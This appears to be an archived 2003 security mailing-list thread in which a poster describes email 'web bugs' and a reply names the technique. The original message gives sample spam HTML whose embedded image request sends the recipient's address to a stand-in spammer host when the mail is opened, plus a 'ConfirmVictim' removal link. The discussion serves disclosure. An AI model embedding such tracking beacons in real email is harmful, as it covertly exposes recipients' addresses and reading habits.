RE: spam technique name?

This technique is very common and has been use since the mid-90s. Here's a bit more information about the use of "Web bugs" in email:

http://www.privacyfoundation.org/resources/webbug.asp

Richard

-----Original Message-----
From: Calderon, Juan C (CORP, DDEMESIS)
[mailto:Juan.Calderon@ddemesis.ge.com]
Sent: Tuesday, April 22, 2003 12:06 PM
To: webappsec@securityfocus.com
Subject: spam technique name?

Hello all

Recently I was thinking about a technique that could be used by spammers, I don't know a common name or something for such a technique, so if you know it please let me know.

PROBLEM
        How can a spammer know if the victim opened the mail?, one is the well known "Remove Me" link which, in fact, will confirm user read the message (and probably will be bombed with many more, now that he said "hey!, I'm here"). However, it requires user interaction.

SOLUTION
        A simple "solution" can be to insert a Image, Link (for CSS for example) or Script tag in the HTML mail, all those elements indicate Web browsers to send a GET request using the SRC or HREF attribute, without user interaction.

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Sample Code (Mail sent to ficticious peter@foomail.com)
<HTML>
<BODY>

	Dear Peter

	Buy our brand new product, CHEAP, CHEAP, CHEAP....
	

src='http://www.spamer.com/AutoRecordAddress.php?email=peter%40foomail%2
Ecom'><br>

        Click <a href='http://www.spamer.com/ConfirmVictim.php'>Here</a>
to be removed<br>

        NOTE:the presence of this link indicates this is not spamming
even if you don't ask for this email


</BODY>


</HTML>


Viewing (or "previewing" in Outlook or similar) this email will
automatically send a request for a "image" file served by a Server-side
script, first recording the data without explicit authorization.

I've tested this (using 3 different tags) using Exchange and some others
public accounts. I have succeed in all cases.

So have you seen something similar? do you think this is a kind of XSS?
I do.


cheers :)


Juan C Calderon


IT Security
Received on Tue Apr 22 13:56:53 2003